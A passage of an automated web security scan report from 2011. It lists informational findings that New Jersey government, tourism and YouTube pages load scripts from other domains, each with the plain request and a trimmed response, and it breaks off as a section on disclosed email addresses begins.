http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js
http://www.google.com/jsapi?key=notsupplied-wizard
http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js

Request

GET /lottery/games/1-6_pick3.shtml HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.63. http://www.state.nj.us/lottery/games/1-7_instant_match.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/lottery/games/1-7_instant_match.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js
http://www.google.com/jsapi?key=notsupplied-wizard
http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js

Request

GET /lottery/games/1-7_instant_match.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:21 GMT
Content-length: 13968
Content-type: text/html
Last-modified: Mon, 11 Jul 2011 19:14:45 GMT
Etag: "3690-4e1b4ba5"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>

<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../style/internal.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js"></script>
...[SNIP]...

13.64. http://www.state.nj.us/lottery/home.shtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/lottery/home.shtml

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.6.0/jquery.min.js
http://www.google.com/jsapi?key=notsupplied-wizard
http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js

Request

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:44:23 GMT
Content-type: text/html
Connection: close
Content-Length: 14669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>
<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="style/home.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.0/jquery.min.js"></script>
...[SNIP]...

13.65. http://www.state.nj.us/lottery/instant/2-0_instant_games.shtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/lottery/instant/2-0_instant_games.shtml

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js
http://www.google.com/jsapi?key=notsupplied-wizard
http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js

Request

GET /lottery/instant/2-0_instant_games.shtml HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.66. http://www.state.nj.us/lottery/multimedia/9-0_multimedia.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/lottery/multimedia/9-0_multimedia.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js
http://www.google.com/jsapi?key=notsupplied-wizard
http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js

Request

GET /lottery/multimedia/9-0_multimedia.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.67. http://www.state.nj.us/lottery/news/5-0_news.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/lottery/news/5-0_news.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js
http://www.google.com/jsapi?key=notsupplied-wizard
http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js

Request

GET /lottery/news/5-0_news.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.68. http://www.state.nj.us/lottery/news/p071111.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/lottery/news/p071111.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.6.0/jquery.min.js
http://www.google.com/jsapi?key=notsupplied-wizard
http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js

Request

GET /lottery/news/p071111.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:18 GMT
Content-length: 2831
Content-type: text/html
Last-modified: Tue, 12 Jul 2011 12:32:39 GMT
Etag: "b0f-4e1c3ee7"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>
<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../style/internal.css" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.0/jquery.min.js"></script>
...[SNIP]...

13.69. http://www.state.nj.us/lottery/news/p071111a.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/lottery/news/p071111a.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.6.0/jquery.min.js
http://www.google.com/jsapi?key=notsupplied-wizard
http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js

Request

GET /lottery/news/p071111a.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:18 GMT
Content-length: 2798
Content-type: text/html
Last-modified: Tue, 12 Jul 2011 12:32:40 GMT
Etag: "aee-4e1c3ee8"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>
<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../style/internal.css" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.0/jquery.min.js"></script>
...[SNIP]...

13.70. http://www.state.nj.us/lottery/retailer/7-0_retailer.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/lottery/retailer/7-0_retailer.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js
http://www.google.com/jsapi?key=notsupplied-wizard
http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js

Request

GET /lottery/retailer/7-0_retailer.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.71. http://www.state.nj.us/lottery/vip/3-0_vip_gen_info.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/lottery/vip/3-0_vip_gen_info.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js
http://www.google.com/jsapi?key=notsupplied-wizard
http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js

Request

GET /lottery/vip/3-0_vip_gen_info.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.72. http://www.state.nj.us/lottery/where/4-0_where.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/lottery/where/4-0_where.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js
http://www.google.com/jsapi?key=notsupplied-wizard
http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js

Request

GET /lottery/where/4-0_where.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.73. http://www.state.nj.us/treasury/doinvest/history3.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/treasury/doinvest/history3.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.nj.gov/nj/includes/scripts/common_functions.js
http://www.nj.gov/nj/includes/scripts/custom_functions.js

Request

GET /treasury/doinvest/history3.html HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:44 GMT
Content-length: 4769
Content-type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="EN" lang="EN">
<head>

...[SNIP]...
<meta name="description" content="Send a Virtual Postcards"/>
<script language="JavaScript" src="http://www.nj.gov/nj/includes/scripts/common_functions.js" type="text/JavaScript"></script>
<script language="JavaScript" src="http://www.nj.gov/nj/includes/scripts/custom_functions.js" type="text/JavaScript"></script>
...[SNIP]...

13.74. http://www.state.nj.us/treasury/revenue/credcrd.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/treasury/revenue/credcrd.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.nj.gov/nj/includes/scripts/common_functions.js
http://www.nj.gov/nj/includes/scripts/custom_functions.js

Request

GET /treasury/revenue/credcrd.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:39 GMT
Content-length: 4769
Content-type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="EN" lang="EN">
<head>

...[SNIP]...
<meta name="description" content="Send a Virtual Postcards"/>
<script language="JavaScript" src="http://www.nj.gov/nj/includes/scripts/common_functions.js" type="text/JavaScript"></script>
<script language="JavaScript" src="http://www.nj.gov/nj/includes/scripts/custom_functions.js" type="text/JavaScript"></script>
...[SNIP]...

13.75. http://www.state.nj.us/treasury/revenue/dcr/geninfo/fees_pd.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/treasury/revenue/dcr/geninfo/fees_pd.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.nj.gov/nj/includes/scripts/common_functions.js
http://www.nj.gov/nj/includes/scripts/custom_functions.js

Request

GET /treasury/revenue/dcr/geninfo/fees_pd.html HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:40 GMT
Content-length: 4769
Content-type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="EN" lang="EN">
<head>

...[SNIP]...
<meta name="description" content="Send a Virtual Postcards"/>
<script language="JavaScript" src="http://www.nj.gov/nj/includes/scripts/common_functions.js" type="text/JavaScript"></script>
<script language="JavaScript" src="http://www.nj.gov/nj/includes/scripts/custom_functions.js" type="text/JavaScript"></script>
...[SNIP]...

13.76. http://www.state.nj.us/treasury/revenue/dcr/geninfo/genserv.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/treasury/revenue/dcr/geninfo/genserv.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.nj.gov/nj/includes/scripts/common_functions.js
http://www.nj.gov/nj/includes/scripts/custom_functions.js

Request

GET /treasury/revenue/dcr/geninfo/genserv.html HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.77. http://www.state.nj.us/treasury/revenue/dcr/geninfo/instform.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/treasury/revenue/dcr/geninfo/instform.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.nj.gov/nj/includes/scripts/common_functions.js
http://www.nj.gov/nj/includes/scripts/custom_functions.js

Request

GET /treasury/revenue/dcr/geninfo/instform.html HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.78. http://www.state.nj.us/treasury/revenue/elffaq.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/treasury/revenue/elffaq.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.nj.gov/nj/includes/scripts/common_functions.js
http://www.nj.gov/nj/includes/scripts/custom_functions.js

Request

GET /treasury/revenue/elffaq.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.79. http://www.unclaimedproperty.nj.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.unclaimedproperty.nj.gov
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.state.nj.us/treasury/javascript/menu_com.js
http://www.state.nj.us/treasury/javascript/menutree.js

Request

GET / HTTP/1.1
Host: www.unclaimedproperty.nj.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:44:42 GMT
Content-type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style>
}
</style>
<meta ht
...[SNIP]...
</script>
<script type='text/javascript' src='http://www.state.nj.us/treasury/javascript/menutree.js'></script>
<script type='text/javascript' src='http://www.state.nj.us/treasury/javascript/menu_com.js'></script>
...[SNIP]...

13.80. http://www.visitnj.org/events previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.visitnj.org
Path:	/events

Issue detail

The response dynamically includes the following script from another domain:

http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit

Request

GET /events HTTP/1.1
Host: www.visitnj.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:44:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Set-Cookie: SESS52105c49ef60fb52c401d408f7374085=3vi18nog2bhk3ks4oft736i4p6; expires=Fri, 05-Aug-2011 05:18:03 GMT; path=/; domain=.visitnj.org
Last-Modified: Tue, 12 Jul 2011 21:24:26 GMT
ETag: "1c02c8d04dbc4f40ed09302c3263264b"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 74284

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"><head>
<meta
...[SNIP]...
</script><script src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...

13.81. http://www.visitnj.org/new-jerseys-wineries previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.visitnj.org
Path:	/new-jerseys-wineries

Issue detail

The response dynamically includes the following scripts from other domains:

http://static.addtoany.com/menu/page.js
http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit

Request

GET /new-jerseys-wineries HTTP/1.1
Host: www.visitnj.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:44:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Set-Cookie: SESS52105c49ef60fb52c401d408f7374085=ordncjvbe1of8k89jthuie26j7; expires=Fri, 05-Aug-2011 05:18:03 GMT; path=/; domain=.visitnj.org
Last-Modified: Tue, 12 Jul 2011 22:00:07 GMT
ETag: "fcfdc2bb205847c6a67cce0b8add1bc2"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42712

<table align="center" border="1" cellspacing="0" style="background:white;color:black;width:80%;"><tr><th colspan="2"> Database Error</th></tr>
<tr><td align="right" valign="top">Message:</td><td>[<b>M
...[SNIP]...
</script><script src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://static.addtoany.com/menu/page.js"></script>
...[SNIP]...

13.82. http://www.youtube.com/NewJerseyGovernment previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/NewJerseyGovernment

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_companion_ad.js
http://s.ytimg.com/yt/js/channel_legacy_all-vflfI-Zw9.js
http://s.ytimg.com/yt/jsbin/www-channel-vflvX29tu.js
http://s.ytimg.com/yt/jsbin/www-core-vflporvst.js
http://www.google.com/jsapi?autoload=%7B%22modules%22%3A%5B%7B%22name%22%3A%22ads%22%2C%22version%22%3A%221%22%2C%22callback%22%3A%22(function()%7B%7D)%22%2C%22packages%22%3A%5B%22content%22%5D%7D%5D%7D
http://www.googletagservices.com/tag/static/google_services.js

Request

GET /NewJerseyGovernment HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:49:45 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=wAQMWIHYLkY; path=/; domain=.youtube.com; expires=Fri, 09-Mar-2012 01:49:45 GMT
Set-Cookie: GEO=c573c10743b77a4d5e57ac0c7e9af241cwsAAAAzVVOtwdbzThz5uQ==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" xmlns:og="http://opengraphprotocol.org/schema/">

<head>

...[SNIP]...
="application/rss+xml" title="RSS" href="http://gdata.youtube.com/feeds/base/users/NewJerseyGovernment/uploads?alt=rss&v=2&orderby=published&client=ytapi-youtube-profile">

<script id="www-core-js" src="//s.ytimg.com/yt/jsbin/www-core-vflporvst.js"></script>
...[SNIP]...
</script>

<script src="//s.ytimg.com/yt/jsbin/www-channel-vflvX29tu.js"></script>

<script src="//s.ytimg.com/yt/js/channel_legacy_all-vflfI-Zw9.js"></script>

<script type="text/javascript" src="http://www.google.com/jsapi?autoload=%7B%22modules%22%3A%5B%7B%22name%22%3A%22ads%22%2C%22version%22%3A%221%22%2C%22callback%22%3A%22(function()%7B%7D)%22%2C%22packages%22%3A%5B%22content%22%5D%7D%5D%7D"></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_companion_ad.js"></script>
...[SNIP]...
</div>

<script src="http://www.googletagservices.com/tag/static/google_services.js"></script>
...[SNIP]...

13.83. http://www.youtube.com/newjerseylottery previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/newjerseylottery

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_companion_ad.js
http://s.ytimg.com/yt/js/channel_legacy_all-vflfI-Zw9.js
http://s.ytimg.com/yt/jsbin/www-channel-vflvX29tu.js
http://s.ytimg.com/yt/jsbin/www-core-vflporvst.js
http://www.google.com/jsapi?autoload=%7B%22modules%22%3A%5B%7B%22name%22%3A%22ads%22%2C%22version%22%3A%221%22%2C%22callback%22%3A%22(function()%7B%7D)%22%2C%22packages%22%3A%5B%22content%22%5D%7D%5D%7D
http://www.googletagservices.com/tag/static/google_services.js

Request

GET /newjerseylottery HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:49:45 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=TlJvxUF36FY; path=/; domain=.youtube.com; expires=Fri, 09-Mar-2012 01:49:45 GMT
Set-Cookie: GEO=c573c10743b77a4d5e57ac0c7e9af241cwsAAAAzVVOtwdbzThz5uQ==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" xmlns:og="http://opengraphprotocol.org/schema/">

<head>

...[SNIP]...
ype="application/rss+xml" title="RSS" href="http://gdata.youtube.com/feeds/base/users/newjerseylottery/uploads?alt=rss&v=2&orderby=published&client=ytapi-youtube-profile">

<script id="www-core-js" src="//s.ytimg.com/yt/jsbin/www-core-vflporvst.js"></script>
...[SNIP]...
</script>

<script src="//s.ytimg.com/yt/jsbin/www-channel-vflvX29tu.js"></script>

<script src="//s.ytimg.com/yt/js/channel_legacy_all-vflfI-Zw9.js"></script>

<script type="text/javascript" src="http://www.google.com/jsapi?autoload=%7B%22modules%22%3A%5B%7B%22name%22%3A%22ads%22%2C%22version%22%3A%221%22%2C%22callback%22%3A%22(function()%7B%7D)%22%2C%22packages%22%3A%5B%22content%22%5D%7D%5D%7D"></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_companion_ad.js"></script>
...[SNIP]...
</div>

<script src="http://www.googletagservices.com/tag/static/google_services.js"></script>
...[SNIP]...

13.84. https://www6.state.nj.us/LOT_LVC/jsp/lvc1_0_vip_reg.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www6.state.nj.us
Path:	/LOT_LVC/jsp/lvc1_0_vip_reg.jsp

Issue detail

The response dynamically includes the following script from another domain:

https://ajax.googleapis.com/ajax/libs/jquery/1.6.0/jquery.min.js

Request

GET /LOT_LVC/jsp/lvc1_0_vip_reg.jsp HTTP/1.1
Host: www6.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.85. https://www6.state.nj.us/LOT_LVC/jsp/lvc1_S0_login.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www6.state.nj.us
Path:	/LOT_LVC/jsp/lvc1_S0_login.jsp

Issue detail

The response dynamically includes the following script from another domain:

https://ajax.googleapis.com/ajax/libs/jquery/1.6.0/jquery.min.js

Request

GET /LOT_LVC/jsp/lvc1_S0_login.jsp HTTP/1.1
Host: www6.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:49:47 GMT
Content-type: text/html;charset=ISO-8859-1
Set-cookie: JSESSIONID=16461B7951076D32FDBB1BA8E456A263;Path=/LOT_LVC;Secure
Set-cookie: JROUTE=LbS7;Path=/LOT_LVC;Secure
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="stylesheet" type="text/css" href="https://www.state.nj.us/lottery/style/internal_vip.css" />
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.0/jquery.min.js"></script>
...[SNIP]...

13.86. https://www6.state.nj.us/LOT_LVC/jsp/lvc2_0_vip_forgot.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www6.state.nj.us
Path:	/LOT_LVC/jsp/lvc2_0_vip_forgot.jsp

Issue detail

The response dynamically includes the following script from another domain:

https://ajax.googleapis.com/ajax/libs/jquery/1.6.0/jquery.min.js

Request

GET /LOT_LVC/jsp/lvc2_0_vip_forgot.jsp HTTP/1.1
Host: www6.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:49:46 GMT
Content-type: text/html;charset=ISO-8859-1
Set-cookie: JSESSIONID=FB888807FE5D253932A30F86C16CC14E;Path=/LOT_LVC;Secure
Set-cookie: JROUTE=LbS7;Path=/LOT_LVC;Secure
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="stylesheet" type="text/css" href="https://www.state.nj.us/lottery/style/internal_vip.css" />
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.0/jquery.min.js"></script>
...[SNIP]...

14. Email addresses disclosed previous next
There are 56 instances of this issue:

http://assembly.state.ny.us/
http://climate.rutgers.edu/njwxnet/station.php
http://code.google.com/p/swfobject/
http://courts.delaware.gov/
http://grimm.house.gov/
http://hanna.house.gov/
http://jqueryui.com/about
